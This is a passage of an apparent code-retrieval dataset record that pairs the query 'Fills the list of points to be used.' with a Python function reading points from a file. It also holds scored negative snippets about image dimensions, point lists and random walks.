height_split[0]\n elif classname == \"classE_exr\":\n size = os.path.basename(image).split('_')[2]\n try:\n dimension_cmd = [\"identify\", '-size', size, '-format', '%w,%h,%z', image]\n width, height, depth = subprocess.check_output(dimension_cmd).split(\",\")\n except subprocess.CalledProcessError as e:\n print dimension_cmd, e.output\n else:\n try:\n dimension_cmd = [\"identify\", '-format', '%w,%h,%z', image]\n width, height, depth = subprocess.check_output(dimension_cmd).split(\",\")\n except subprocess.CalledProcessError as e:\n print dimension_cmd, e.output\n return width, height, depth", "def get_array_size():\n tg_file = 'NA_CAS_gauges.txt'\n lines = open(tg_file).readlines()\n tg_nbr = len(lines)\n return tg_nbr", "def GetPixelDimensions(self):\n _, width, _, _, _, height = 
self.GetGeoTransform()\n return XY(x=width, y=height)", "def numPixels(self):\n\t\treturn self.size", "def numPixels(self):\n\t\treturn self.size", "def getFileSize(filename):\n\tfilename = adaptPath(filename)\n\tfrom os import stat\n\tfrom stat import ST_SIZE\n\treturn stat(filename)[ST_SIZE]", "def get_image_size(file_name):\r\n return Image.open(file_name).size", "def findWidthHeight():\n\n for f in os.listdir(\"%s/train/images/\" % args.dataset):\n if f.endswith(\".jpeg\"):\n imf = \"%s/train/images/%s\" % (args.dataset, f)\n try:\n im = Image.open(imf)\n except:\n print \"Could not open training image %s to read its size.\" %imf\n usage()\n break\n \n width = int(im.size[0])\n height = int(im.size[1])\n \n nwidth = width\n nheight = height\n if args.width:\n nwidth = args.width\n if args.height:\n nheight = args.height\n\n return width, height, nwidth, nheight, not(width == nwidth and height == nheight)", "def count_positions(fname):\r\n with open(fname) as f:\r\n for i, l in enumerate(f):\r\n pass\r\n return i + 1", "def _get_image_dimensions(self):\n\t\timageWidth = int(self.labels['IMAGE']['LINE_SAMPLES'])\n\t\timageHeight = int(self.labels['IMAGE']['LINES'])\n\t\treturn imageWidth, imageHeight", "def get_points_number(self):\n ncontour = self.get_contours_number\n npoints = []\n for i in range(0, ncontour):\n npoints.append(len(self.x[i]))\n return npoints", "def get_dimensions(view: View, path: str):\n\n # Allow max automatic detection and remove gutter\n max_width, max_height = view.viewport_extent()\n max_width *= 0.75\n max_height *= 0.75\n max_ratio = max_height / max_width\n\n # Get image dimensions\n try:\n width, height, _ = get_image_size(path)\n except UnknownImageFormat:\n return -1, -1\n\n # First check height since it's the smallest vector\n if height / width >= max_ratio and height > max_height:\n ratio = max_height / height\n width *= ratio\n height *= ratio\n elif height / width <= max_ratio and width > max_width:\n ratio = max_width / width\n width *= ratio\n height *= ratio\n\n return width, height", "def length(self):\n mmap = self.memmap;\n self.memmap = 'r';\n data = self.load();\n self.memmap = mmap;\n return data.shape[0];", "def dimensions(self, varname):\n if self.handle == None: return None\n try:\n var = self.handle.variables[varname]\n except KeyError:\n return None\n return var.dimensions", "def size_in(self):\n return self.dimensions" ]
[ "0.6812365", "0.6810448", "0.68029106", "0.6689416", "0.6590357", "0.6507463", "0.64789444", "0.6432954", "0.6427297", "0.63916624", "0.6285233", "0.6277324", "0.62739605", "0.6271587", "0.6249749", "0.6227997", "0.621909", "0.6207011", "0.6204155", "0.6199409", "0.6199409", "0.61801225", "0.61609286", "0.61522937", "0.6140296", "0.6136657", "0.6130958", "0.61279804", "0.6104406", "0.6075339", "0.607509", "0.6068107", "0.60609204", "0.6035447", "0.60301054", "0.6030032", "0.60111403", "0.59867936", "0.5963428", "0.5963072", "0.59513575", "0.59488904", "0.5941695", "0.59353644", "0.59270036", "0.5922135", "0.5909037", "0.59045297", "0.5896305", "0.5886292", "0.5885377", "0.5885132", "0.58845794", "0.5865483", "0.5853475", "0.5851315", "0.5848203", "0.58417594", "0.583994", "0.58337116", "0.58316714", "0.58006984", "0.57963914", "0.5794602", "0.5794154", "0.5793213", "0.578388", "0.578388", "0.578388", "0.578388", "0.5775742", "0.57640034", "0.5763424", "0.5743422", "0.57331914", "0.57310194", "0.57288766", "0.57280755", "0.5724932", "0.5724254", "0.5719392", "0.5713032", "0.57056427", "0.57029116", "0.5695101", "0.56891054", "0.5688601", "0.56879044", "0.5686284", "0.5686284", "0.56836104", "0.56804377", "0.5677087", "0.56730783", "0.56725425", "0.56616384", "0.56498945", "0.5644427", "0.564202", "0.5637194" ]
0.6965317
0
Fills the list of points to be used.
def fill_points_list(filename):
    f = open(input_file_test(filename), "r")

    dimension = find_dimesion(filename)
    points = list()
    line_count = 1
    flag = False
    for line in f:
        current_point = line.split()

        if dimension == len(current_point):
            check_if_number(current_point)
            point = Point(points=current_point, line=line_count)
            points.append(point)

            line_count += 1
        else:
            flag=True
            break

    if flag:
        print PointError()
        sys.exit()

    if len(points) ==1:
        print NotEnoughPointError()
        sys.exit()

    f.close()

    return points
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def refresh(self):\n self._list_of_points = []\n self._add_points()", "def fill_step(self):\n while len(self.x_values) < self.num_points\n x_step = self.get_step()\n y_step = self.get_step()\n if x_step == 0 and y_step == 0:\n continue\n next_x = self.x_values[-1] x x_step\n next_y = self.y_values[-1] + y_step\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def setPointFill(self, fill):\n for point in self.points:\n point.fill = fill", "def fill_vectors(self):\n # use random numbers for generating plot data:\n random.seed(9) # fix the seed for testing\n for index in range(self.npoints):\n self.vector_x.append(index) # x coordinates\n for y in range(self.ncurves):\n self.vector_y[y].append(random.uniform(0,8))", "def pointsSetUp(self):\r\n self.background.draw(self.surface)\r\n for i in range(len(self.points)):\r\n self.points[i].organize()\r\n self.points[i].update()\r\n self.points[i].addNumber(i)\r\n self.points[i].setActiveTurn()", "def _add_points(self):\n if not '_list_of_points' in self.__dict__.keys():\n self._list_of_points = [] \n for point in self['point'].items():\n self._list_of_points.append(point[1])", "def fill(self, products):\n unplaced = []\n self.x = 0\n for p in products:\n if self.x + p.width < Cage.width:\n p.location = self.x, self.y, self.z\n self.placed_products.append(p)\n self.x += p.width\n else:\n unplaced.append(p)\n return unplaced", "def fill_walk(self):\n\n # keep walking until walk reaches desired length\n while len(self.x_values) < self.num_points:\n\n x_step = self.get_step()\n y_step = self.get_step()\n\n #rejects streps that do nowhere\n if y_step == 0 and x_step ==0:\n continue\n\n #calculate the next x and y values for the list and add it [-1] gets the last item in a list\n next_x = self.x_values[-1] + x_step\n next_y = self.y_values[-1] + y_step\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def assignPointsToShapes(self):\n pointsCopy = self.mission['points'].copy()\n\n while len(pointsCopy):\n shape = []\n self.recursiveAddPointToShape(pointsCopy, [pointsCopy[0]], shape)\n shape.append(shape[0])\n self.mission['shapes'].append(shape)", "def addPoints(self, points):\r\n self.points = points", "def set_points(self, pts):\n\n self.minX = sys.maxint\n self.minY = sys.maxint\n self.maxX = sys.maxint * -1\n self.maxY = sys.maxint * -1\n\n self.points = []\n #self.mbr = Rect()\n for p in pts:\n x,y = p\n\n if x < self.minX:\n self.minX = x\n if x > self.maxX:\n self.maxX = x\n if y < self.minY:\n self.minY = y\n if y > self.maxY:\n self.maxY = y\n\n self.points.append(Point(x,y))\n\n self.mbr = Rect(Point(self.minX,self.minY),Point(self.maxX,self.maxY))", "def __init__(self, *points):\n self_points = []\n self._min_values = []\n self._max_values = []\n\n if len(points) == 1:\n self.points = points[1]\n elif len(points) > 1:\n self.points = points", "def __init__(self, pts=[]):\n self.set_points(pts)", "def fit (self,points):\n all_coordinates = [p.coordinates for p in points]\n for i in range(len(all_coordinates[0])):\n if (len(self.min_coordinate)<=i):\n self.min_coordinate.append(all_coordinates[0][i])\n self.max_coordinate.append(all_coordinates[0][i])\n for x in all_coordinates:\n if(self.max_coordinate[i]<x[i]):\n self.max_coordinate[i]=x[i]\n if(self.min_coordinate[i]>x[i]):\n self.min_coordinate[i]=x[i]", "def add_points(self, points):\n pass", "def set_points(self, val=None):\r\n self._points = self.nx*self.ny*self.nz", "def fill_motion(self):\n while len(self.x_values) < self.num_points:\n x_direction = 
choice([1, -1])\n x_distance = choice([0, 1, 2, 3, 4])\n x_movement = x_direction * x_distance\n\n y_direction = choice([1, -1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_movement = y_direction * y_distance\n\n # Rejecting motion that goes nowhere.\n if x_movement == 0 and y_movement == 0:\n continue\n\n # Calculating the next x and y values.\n next_x = self.x_values[-1] + x_movement\n next_y = self.y_values[-1] + y_movement\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)", "def set_points(self, points):\n self.slmm = SlidingWindowMinMax()\n self.front = self.length - 1\n self.rear = None\n\n self.add_points(points)", "def __init__(self, points):\n self.points = points\n self.init()", "def addPoints(self, points):\n self.points.extend(points)", "def add_points(self, points):\n for pt in points:\n self._add(pt)\n self.update_limits()", "def __new_position(self):\n iterables = [range(self.size_x), range(self.size_y)]\n points = [] # Save all points in size.\n for point in itertools.product(*iterables):\n points.append(point)\n\n current_points = [] # Save used points.\n for object in self.objects:\n if (object.x, object.y) not in current_points:\n current_points.append((object.x, object.y))\n\n for point in current_points:\n points.remove(point) # Remove all used points.\n\n location = np.random.choice(a=range(len(points)), replace=False)\n return points[location]", "def generate_points(num_points):\n for i in xrange(0, num_points):\n pass", "def fill(self, water: float, ounces: int) -> None:\n self.values = []\n for i in range(ounces):\n self.values.append(water)", "def set_starting_points(self, number_of_points):\n n = int(number_of_points)\n self.init_value = n\n self.number_of_points = n\n self.x, self.y = [], []\n self.pp = [1] * 10\n self.pp_values = self.pp.copy()\n self.pp_mapping()\n r = 40\n for i in range(n):\n self.x.append(50 + r*math.cos(2*math.pi * i/n))\n self.y.append(50 + r*math.sin(2*math.pi * i/n))\n for i in self.text_boxes:\n i.set_val(\"1\")\n self.redraw()", "def add_points(self, *points):\r\n for pts in points:\r\n if not isinstance(pts, list):\r\n pts = [pts] # Make list of one\r\n for point in pts:\r\n self.points.append(point)", "def fill_walk(self):\n\n #keep taking steps until the walk reaches the desired length\n while len(self.x_values) < self.num_points:\n x_direction = choice([1,-1])\n x_distance = choice ([0,1,2,3,4])\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice ([0,1,2,3,4])\n y_step = y_direction * y_distance\n\n #calculate new x\n newx = self.x_values[-1]+x_step\n if newx < 0:\n newx = 0\n\n #calculate new y\n newy = self.y_values[-1] + y_step\n if newy < 0:\n newy = 0\n\n self.x_values.append(newx)\n self.y_values.append(newy)", "def fillInPoints(lsOriginal, intIterations = 1):\r\n assert len(lsOriginal) > 1\r\n \r\n # Loop through number of intermediate fillings.\r\n for j in range(0,intIterations):\r\n # New (filled) list.\r\n lsFilled = []\r\n for i in range(0, len(lsOriginal) - 1):\r\n lsFilled.append(lsOriginal[i])\r\n fltIntermediate = (lsOriginal[i] +\r\n (lsOriginal[i + 1] - lsOriginal[i]) / 2.0)\r\n lsFilled.append(fltIntermediate)\r\n # Edge case to add last element of original list.\r\n if i == (len(lsOriginal) - 2):\r\n lsFilled.append(lsOriginal[i + 1])\r\n lsOriginal = lsFilled\r\n \r\n # Return the filled list.\r\n return lsFilled", "def fill(self, func=lambda: random().getdigits(1), diag=None):\n for y,x in self.coords(diag):\n self.store(y,x, func())", "def __init__(self, 
points):\n\t\tself.points = points", "def update_data():\n values = temp_serial_placeholder()\n time = current_time_milli() - __start\n points = [ [time, values[0]], [time, values[1]] ]\n __data.append(points)\n return points", "def reset_points_table(self):\n num_agents = len(self.agent_locs)\n self.points_table = np.tile(self.default_points_table, [num_agents, 1, 1])", "def fix_datapoints(known_points, start_time, end_time, step, debug_key):\n logger.debug(\"fix_datapoints() key=%s len_known_points=%d\", debug_key, len(known_points))\n if len(known_points) == 1:\n logger.debug(\"fix_datapoints() key=%s only_known_point=%s\", debug_key, known_points[0])\n elif len(known_points) > 1:\n logger.debug(\"fix_datapoints() key=%s first_known_point=%s\", debug_key, known_points[0])\n logger.debug(\"fix_datapoints() key=%s last_known_point=%s\", debug_key, known_points[-1])\n\n datapoints = []\n steps = int(round((end_time - start_time) * 1.0 / step))\n # if we have 3 datapoints: at 0, at 60 and 120, then step is 60, steps = 2 and should have 3 points\n # note that graphite assumes data at quantized intervals, whereas in influx they can be stored at like 07, 67, etc.\n ratio = len(known_points) * 1.0 / (steps + 1)\n statsd.timer('service_is_graphite-api.target_type_is_gauge.unit_is_none.what_is_known_points/needed_points', ratio)\n\n if len(known_points) == steps + 1:\n logger.debug(\"fix_datapoints() key=%s -> no steps missing!\", debug_key)\n datapoints = [p[2] for p in known_points]\n else:\n amount = steps + 1 - len(known_points)\n logger.debug(\"fix_datapoints() key=%s -> fill %d missing steps with None values\", debug_key, amount)\n next_point = 0\n for s in range(0, steps + 1):\n # if we have no more known points, fill with None's\n # even ininitially when next_point = 0, len(known_points) might be == 0\n if next_point >= len(known_points):\n datapoints.append(None)\n continue\n\n # if points are not evenly spaced. i.e. they should be a minute apart but sometimes they are 55 or 65 seconds,\n # and if they are all about step/2 away from the target timestamps, then sometimes a target point has 2 candidates, and\n # sometimes 0. So a point might be more than step/2 older. 
in that case, since points are sorted, we can just forward the pointer\n # influxdb's fill(null) will make this cleaner and stop us from having to worry about this.\n\n should_be_near = start_time + step * s\n diff = known_points[next_point][0] - should_be_near\n while next_point + 1 < len(known_points) and diff < (step / 2) * -1:\n next_point += 1\n diff = known_points[next_point][0] - should_be_near\n\n # use this point if it's within step/2 from our target\n if abs(diff) <= step / 2:\n datapoints.append(known_points[next_point][2])\n next_point += 1 # note: might go out of bounds, which we use as signal\n\n else:\n datapoints.append(None)\n\n logger.debug(\"fix_datapoints() key=%s len_known_points=%d, len_datapoints=%d\", debug_key, len(known_points), len(datapoints))\n logger.debug(\"fix_datapoints() key=%s first_returned_point=%s, last_returned_point=%s\", debug_key, datapoints[0], datapoints[-1])\n return datapoints", "def get_dots(self):\n logging.debug('Generate dots to draw')\n gc = self.coordinates\n coords = []\n zmin = ymin = xmin = self.fmin = 999999\n self.fmax = 0\n for line in gc:\n temp = [None, None, None, None] # X, Y, Z, Feedrate\n for c in line:\n if c.startswith('X'):\n temp[0] = float(c[1:])\n xmin = min(xmin, temp[0])\n elif c.startswith('Y'):\n temp[1] = float(c[1:])\n ymin = min(ymin, temp[1])\n elif c.startswith('Z'):\n temp[2] = float(c[1:])\n zmin = min(zmin, temp[2])\n elif c.startswith('F'):\n temp[3] = int(float(c[1:]))\n self.fmin = min(self.fmin, temp[3])\n self.fmax = max(self.fmax, temp[3])\n if ((temp[0] is not None) or (temp[1] is not None) or\n (temp[2] is not None) or (temp[3] is not None)):\n if coords:\n if temp[0] is None:\n temp[0] = coords[-1][0]\n if temp[1] is None:\n temp[1] = coords[-1][1]\n if temp[2] is None:\n temp[2] = coords[-1][2]\n if temp[3] is None:\n temp[3] = coords[-1][3]\n coords.append(temp)\n\n if (self.fmin == 999999) or (self.fmax == 0):\n raise GcodeError('Please check feedrate')\n if (xmin == ymin == zmin == 999999):\n raise GcodeError('Please check coordinates')\n if xmin == 999999:\n xmin = 0\n if ymin == 999999:\n ymin = 0\n if zmin == 999999:\n zmin = 0\n\n for i in coords: # if something is still 0\n if i[0] is None:\n i[0] = xmin\n if i[1] is None:\n i[1] = ymin\n if i[2] is None:\n i[2] = zmin\n if i[3] is None:\n i[3] = self.fmin\n i[0] -= xmin\n i[1] -= ymin\n i[2] -= zmin\n i[3] -= self.fmin\n\n self.fmax -= self.fmin\n self.colors_list = grad(MIN_COLOR, MAX_COLOR, self.fmax+1)\n\n dots = []\n for i in range(len(coords)):\n temp = []\n if i != len(coords)-1:\n temp = self.getColorLine(coords[i], coords[i+1])\n if temp:\n dots.extend(temp)\n\n return dots", "def drawPoints(self, points, color):\n for p in points:\n Point\n p.color = color\n p.radius = self.points_radius\n p.conversion = False\n p.show(self.context)", "def initiate(self):\n pts = []\n for point in self.points:\n pt = gr.Point(point[0],point[1])\n pts.append(pt)\n\n self.vis = [gr.Polygon(pts)]\n\n self.draw()", "def applyToPoints(self, points):\n return [point + self for point in points]", "def set(self, point):\n self.components = [c for c in point]", "def fill_missing_data_points(data):\n return data.interpolate()", "def fill(self, filler):\n\n for x in range(self.__xmax):\n for y in range(self.__ymax):\n self.__data[(x,y)] = filler(x,y) % self.mod", "def fill_draw(self):\n self.draw = [x + str(y) for x in COLOR for y in CARD_VALUE]", "def _fill_input(self):\n for sc in self.initial:\n if sc not in self.litter:\n self.litter[sc] = [0., 0., 0., 
0., 0., 0.,\n 0., 0., 0., 0., 0., 0.]\n for sc in self.litter:\n if sc not in self.initial:\n self.initial[sc] = [0., 0., 0., 0., 0., 0.,\n 0., 0., 0., 0., 0., 0.]", "def draw_filled_polygon(\n self, points: Iterable[Vec3], properties: Properties\n ) -> None:\n raise NotImplementedError", "def __init__(self, rows, columns, fillValue = None):\n self.data = []\n for row in range(rows):\n dataInRow = []\n for column in range(columns):\n dataInRow.append(fillValue)\n self.data.append(dataInRow)", "def fitPoints(self, points, atoms=None):\n self.dataPoints = points\n self.dataSignatures = []\n if atoms:\n iterList = zip(points, atoms)\n else:\n iterList = [(p, None) for p in points]\n for point, atom in iterList:\n testPoint = [c if c > 0 else self.size[i]-c for i, c in enumerate(point)]\n testPoint = [c if c < self.size[i] else c % self.size[i] for i, c in enumerate(testPoint)]\n signature = self.grid.getSignature2(testPoint, self.spacings)\n self.dataSignatures.append(signature)\n if not atoms:\n try:\n self.tree[tuple(signature)].append(point)\n except KeyError:\n self.tree[tuple(signature)] = [point]\n else:\n try:\n self.tree[tuple(signature)].append(atom)\n except KeyError:\n self.tree[tuple(signature)] = [atom]", "def init_hit_points(self, hit_points):\n self.hit_points = [hit_points, hit_points]", "def setPoints(self, value):\n assert type(value) in [int, float]\n self._points = value", "def set_points(self):\n for p in range(len(self.points)):\n self.points[p] = self.points[p] + self.speeds[p]\n if self.points[p].x > SCREEN_DIM[0] or self.points[p].x < 0:\n self.speeds[p].x = -self.speeds[p].x\n if self.points[p].y > SCREEN_DIM[1] or self.points[p].y < 0:\n self.speeds[p].y = -self.speeds[p].y", "def reset(self):\n super(PolygonTool, self).reset()\n # self.__nsides = None\n # self.__increment = None\n # self.__external = False # make this adjustable?\n self.__center = None\n for _i in range(self.__nsides):\n self.__xpts[_i] = 0.0\n self.__ypts[_i] = 0.0", "def get_all_xy(self):\n self.all_y = list(\n zip(\n self.open,\n self.open,\n self.high,\n self.low,\n self.close,\n self.close,\n self.empty,\n )\n )\n if self.dates is not None:\n date_dif = []\n for i in range(len(self.dates) - 1):\n date_dif.append(self.dates[i + 1] - self.dates[i])\n date_dif_min = (min(date_dif)) / 5\n self.all_x = [\n [x - date_dif_min, x, x, x, x, x + date_dif_min, None]\n for x in self.dates\n ]\n else:\n self.all_x = [\n [x - 0.2, x, x, x, x, x + 0.2, None] for x in range(len(self.open))\n ]", "def addDataPoints(self):\n pass", "def update(self, foodList):\n self.positions = list(map(lambda point: [point['x'], point['y']], foodList['data']))", "def find_points(self):\n\n points = [\n (self.inner_radius, 0, \"straight\"),\n (self.inner_radius, self.height / 2, \"straight\"),\n (self.outer_radius, self.height / 2, \"straight\"),\n (self.outer_radius, self.arc_height / 2, \"circle\"),\n (self.mid_radius, 0, \"circle\"),\n (self.outer_radius, -self.arc_height / 2, \"straight\"),\n (self.outer_radius, -self.height / 2, \"straight\"),\n (self.inner_radius, -self.height / 2, \"straight\")\n ]\n\n self.points = points", "def fill_octree(self):\n if len(self.children) <= 0:\n self.generate_octants()\n for point in self.points:\n self.append_point(point)\n self.points = np.array([])", "def create_points(self):\n v1 = 0.0\n v2 = 0.5\n v3 = 0.25\n v4 = 0.2 # only used for hexgrid\n\n points = []\n\n points.append((v1, v1, v1)) # 0\n points.append((v2, v1, v1)) # 1\n points.append((v2, v2, v1)) # 2\n points.append((v1, 
v2, v1)) # 3\n\n points.append((v1, v1, v2)) # 4\n points.append((v2, v1, v2)) # 5\n points.append((v2, v2, v2)) # 6\n points.append((v1, v2, v2)) # 7\n\n points.append((v3, v1, v1)) # 8\n points.append((v2, v3, v1)) # 9\n points.append((v3, v2, v1)) # 10\n points.append((v1, v3, v1)) # 11\n\n points.append((v1, v1, v3)) # 12\n points.append((v2, v1, v3)) # 13\n points.append((v2, v2, v3)) # 14\n points.append((v1, v2, v3)) # 15\n\n points.append((v3, v1, v2)) # 16\n points.append((v2, v3, v2)) # 17\n points.append((v3, v2, v2)) # 18\n points.append((v1, v3, v2)) # 19\n\n points.append((v4, v1, v1)) # 20\n points.append((v1, v4, v1)) # 21\n points.append((v1, v1, v4)) # 22\n\n return points", "def onUpdate(self):\n\t\t#fill all the order that satisfied\n\t\tfor x in filter(self.isFilled,self().keys()):\n\t\t\tself[x].fill()", "def fill_walk(self):\n\n # Keep taking steps until the walk reachs the desired length.\n while len(self.x_values) < self.num_points:\n # Decide how far to go in which direction\n x_step = self.get_step()\n y_step = self.get_step()\n\n # Reject moves that go nowhere.\n if x_step == 0 and y_step == 0:\n continue\n\n # Calculate the new position.\n x_position = self.x_values[-1] + x_step\n y_position = self.y_values[-1] + y_step\n\n self.x_values.append(x_position)\n self.y_values.append(y_position)", "def fill_walk(self):\n\n # Keep taking steps until the walk reachs the desired length.\n while len(self.x_values) < self.num_points:\n # Decide how far to go in which direction\n x_step = self.get_step()\n y_step = self.get_step()\n\n # Reject moves that go nowhere.\n if x_step == 0 and y_step == 0:\n continue\n\n # Calculate the new position.\n x_position = self.x_values[-1] + x_step\n y_position = self.y_values[-1] + y_step\n\n self.x_values.append(x_position)\n self.y_values.append(y_position)", "def update_tempLists(self):\n self.current_position = self.mediaPlayer.position()\n\n # I add the current value, calculates its index, and removes it. 
This method is used to know which index the pointer is at.\n bisect.insort(self.xValues,self.current_position)\n self.position_index = self.xValues.index(self.current_position)\n self.xValues.remove(self.current_position)\n\n n = 120\n if self.position_index < n: \n self.tempXList = self.xValues[:self.position_index + n]\n self.tempYList = self.yValues[:self.position_index + n]\n self.tempCList = self.colors[:self.position_index + n]\n else:\n self.tempXList = self.xValues[self.position_index - n :self.position_index + n]\n self.tempYList = self.yValues[self.position_index - n :self.position_index + n]\n self.tempCList = self.colors[self.position_index - n :self.position_index + n]", "def fill_missing(self) -> None:\n\n self.fill_missing_rows()\n self.fill_missing_source_parameters()\n return", "def DrawPointList(self, points, pens=None):\n if pens is None:\n pens = []\n elif isinstance(pens, wx.Pen):\n pens = [pens]\n elif len(pens) != len(points):\n raise ValueError('points and pens must have same length')\n return self._DrawPointList(points, pens, [])", "def _update_imgs_and_pt_list(self, points, edge_points, segs, index):\n # index specifies whether to use the x or y coordinate in x_pts\n x_pts=[]\n for i in range(0, len(points)):\n pt=points[i]\n #edge_points[pt[0],pt[1]] = 255\n x_pts.append(pt[index])\n #segs[pt[0],pt[1]]=150\n\n return x_pts, segs, edge_points", "def fill(self, value, x, y, width, height):\n for sub_y in range(y, y+height):\n for sub_x in range(x, x+width):\n self[sub_x, sub_y] = value", "def __init__(self, points):\n self.endpoints = points", "def func_init(self):\n self.points.set_data([], [])\n for line in self.lines:\n line.set_data([],[])\n self.annotation.set_text('')\n\n return tuple(self.lines) + (self.points, self.annotation)", "def setPointsActive(self):\r\n for point in self.points:\r\n point.setActive()", "def _accumulate_matching_points(self, points):\n if len(self.grid_points) != len(points):\n raise ValueError(\"Expected list of points of len %s, got %s\" % (len(self.grid_points), len(points)))\n for index in xrange(len(self.grid_points)):\n self._validate_descriptors_are_equal(self.grid_points[index].descriptor, points[index].descriptor, [\"frame\"])\n if isinstance(points[index].metrics, ClassificationMetricsValue):\n m = GridSearchClassificationMetrics._create_metric_sum(self.grid_points[index].metrics, points[index].metrics)\n elif isinstance(points[index].metrics, RegressionTestMetrics):\n m = GridSearchRegressionMetrics._create_metric_sum(self.grid_points[index].metrics, points[index].metrics)\n else:\n raise ValueError(\"Incorrect Metrics Class for '%s'\", m)\n self.grid_points[index] = GridPoint(self.grid_points[index].descriptor, m)", "def test_points_calculation(self):\n\n assert self.test_shape.points == [\n (1030.0, 525.0),\n (1030.0, 475.0),\n (970.0, 475.0),\n (970.0, 525.0),\n ]", "def setPoints(self, points):\n ncells, num_verts_per_cell, ndim = points.shape\n if ndim != 3:\n raise RuntimeError(f'ERROR: points.shape[2] != 3, got {ndim}!')\n LIB.mnt_grid_setPointsPtr.argtypes = [POINTER(c_void_p), DOUBLE_ARRAY_PTR]\n LIB.mnt_grid_build.argtypes = [POINTER(c_void_p), c_int, c_longlong]\n ier = LIB.mnt_grid_setPointsPtr(self.obj, points)\n if ier:\n error_handler(FILE, 'setPointsPtr', ier)\n ier = LIB.mnt_grid_build(self.obj, num_verts_per_cell, ncells)\n if ier:\n error_handler(FILE, 'setPointsPtr', ier)", "def fillData(self):\n self.graphColors = c.getGraphColors()\n self._tupleListToStrings()\n self.colorlist.SetSelection(0)\n 
self.delayvalue.SetValue(str(c.getGraphDelay()))\n self._updateButtons(None)", "def fill(self, arr, color=None):\n\n for point in self.points:\n arr[point.x][point.y] = color if color is not None else point.color", "def _gather_points(self):\n # This is just a stub for now. We should really find the lines only\n # inside the screen range here.\n\n x = self.index.get_data()\n y = self.value.get_data()\n rad= min(self.width/2.0,self.height/2.0)\n sx = x*rad+ self.x + self.width/2.0\n sy = y*rad+ self.y + self.height/2.0\n\n points = transpose(array((sx,sy)))\n self._cached_data_pts = points\n self._cache_valid = True\n return", "def __init__(self, num_points = 5000):\n self.num_points = num_points\n\n #all walks start at 0.0\n self.x_values = [0]\n self.y_values = [0]", "def SetInitialPoints(self, x0, radius=0.05):\n raise NotImplementedError, \"must be overwritten...\"", "def fill_walk(self):\n\n #Seguir tomando caminos hasta que se alcance la cantidad establecida.\n while len(self.x_values) < self.num_points:\n\n #Decidir cual direccion tomar y cuan lejos ir hacia esa direccion.\n x_direction = choice([1, -1])\n x_distance = choice([0, 1, 2, 3, 4])\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice([0, 1, 2, 3, 4])\n y_step = y_direction * y_distance\n\n #Ignorar movimientos nulos.\n if x_step == 0 and y_step == 0:\n continue\n\n #Calcular la nueva posicion.\n x = self.x_values[-1] + x_step\n y = self.y_values[-1] + y_step\n\n self.x_values.append(x)\n self.y_values.append(y)", "def __init__(self, dataList):\n xList = []\n yList = []\n\n for index in range(0, len(dataList)):\n xList.append(dataList[index][0])\n yList.append(dataList[index][1])\n self.xList = xList\n self.yList = yList\n self.dataList = dataList", "def _InitialPoints(self):\n raise NotImplementedError, \"a sampling algorithm was not provided\"", "def grow_if_needed(self, points: List[Point]):\n if any(p not in self.grid for p in points):\n right = self.grid.right + 1\n bottom = self.grid.bottom + 1\n for y_pos in range(self.grid.top, bottom):\n new_point = Point(right, y_pos)\n self.grid[new_point] = self.get_geologic_level(new_point)\n for x_pos in range(self.grid.left, right + 1):\n new_point = Point(x_pos, bottom)\n self.grid[new_point] = self.get_geologic_level(new_point)", "def set_points(self, mode='', points=None, range_=RANGE, size=1):\n if mode == 'last':\n if points is None:\n print('Error: empty last point specification given.')\n return\n tol = 0.1\n [i, j, k] = points\n alpha = 2.0 * np.random.rand(1) + 0.5\n beta = 2.0 * np.random.rand(1) + 0.5\n if i >= 0 and j < 0 and k < 0:\n # at one corner of triangle\n assert i < 3\n other = np.delete(np.arange(3), i)\n u = (self.points[i, :] - self.points[other[0], :]\n ) / np.linalg.norm(\n self.points[i, :] - self.points[other[0], :])\n v = (self.points[i, :] - self.points[other[1], :]\n ) / np.linalg.norm(\n self.points[i, :] - self.points[other[1], :])\n self.points[-1, :] = self.points[i, :] + alpha * u + beta * v\n elif i >= 0 and j >= 0 and k < 0:\n found = False\n safety_it = 0\n while not found:\n alpha = np.random.uniform(tol, 1 - tol)\n beta = 1.0 - alpha\n gamma = 2 * np.random.rand(1) + tol\n assert j < 3\n other = np.delete(np.arange(3), (i, j))\n u = (\n self.points[i, :] - self.points[other, :]\n ) # /np.linalg.norm(self.points[i,:] - self.points[other,:])\n v = (\n self.points[j, :] - self.points[other, :]\n ) # /np.linalg.norm(self.points[j,:] - self.points[other,:])\n self.points[-1, :] = (1.0 + gamma) * (\n 
self.points[other, :] + alpha * u + beta * v)\n #check if new direction lies between u and v.\n new_direction = self.points[-1, :] - self.points[other, :]\n new_direction = new_direction.cp.reshape(\n (-1, )) / np.linalg.norm(new_direction)\n u = u.cp.reshape((-1, )) / np.linalg.norm(u)\n v = v.cp.reshape((-1, )) / np.linalg.norm(v)\n if abs(\n acos(np.dot(new_direction, u)) +\n acos(np.dot(new_direction, v)) -\n acos(np.dot(u, v))) < 1e-10:\n found = True\n safety_it += 1\n if safety_it > 100:\n print('Error: nothing found after 100 iterations.')\n return\n elif i >= 0 and j >= 0 and k >= 0:\n # inside triangle\n assert k < 3\n found = False\n safety_it = 0\n while not found:\n alpha = np.random.rand(1) + tol\n beta = np.random.rand(1) + tol\n other = np.delete(np.arange(3), i)\n u = self.points[other[0], :] - self.points[i, :]\n v = self.points[other[1], :] - self.points[i, :]\n temptative_point = self.points[i, :] + alpha * u + beta * v\n vjk = self.points[other[1], :] - self.points[other[0], :]\n njk = [vjk[1], -vjk[0]]\n if (np.dot(self.points[j, :] - self.points[i, :], njk) >\n 0) != (np.dot(temptative_point - self.points[j, :],\n njk) > 0):\n self.points[-1, :] = temptative_point\n found = True\n safety_it += 1\n if safety_it > 100:\n print('Error: nothing found after 100 iterations.')\n return\n elif i < 0 and j < 0 and k < 0:\n x = range_[0] + (\n range_[1] - range_[0]) * np.random.rand(1)\n y = range_[2] + (\n range_[1] - range_[0]) * np.random.rand(1)\n self.points[-1, :] = [x, y]\n else:\n print(\"Error: non-valid arguments.\")\n elif mode == 'random':\n \"\"\" Create N uniformly distributed points in [0, size] x [0, size]\n \"\"\"\n self.points = np.random.uniform(0, size, (self.N, self.d))\n elif mode == 'normal':\n self.points = 